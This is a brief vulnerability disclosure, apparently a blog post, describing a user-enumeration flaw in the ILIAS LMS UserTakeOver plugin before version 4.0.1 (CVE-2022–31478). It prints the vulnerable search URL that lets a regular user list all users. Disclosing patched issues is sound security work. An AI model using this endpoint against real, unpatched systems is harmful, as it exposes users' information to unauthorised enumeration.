ILIAS LMS UserTakeOver < 4.0.1 Vulnerability

While performing security testing on the ILIAS Learning Management System with the UserTakeOver plugin enabled, I noticed that a regular user was able to use the search function to enumerate all users on the system. This is predicated on the user having knowledge of the UserTakeOver search’s URL:

/ilias.php?cmd=search&amp;cmdClass=ilusertakeovermaingui&amp;cmdNode=<SITE SPECIFIC>&amp;baseClass=iluipluginroutergui&amp;q=

This has been fixed in version 4.0.1 but couldn’t find any disclosure or advisory.

CVE-2022–31478
https://github.com/srsolutionsag/UserTakeOver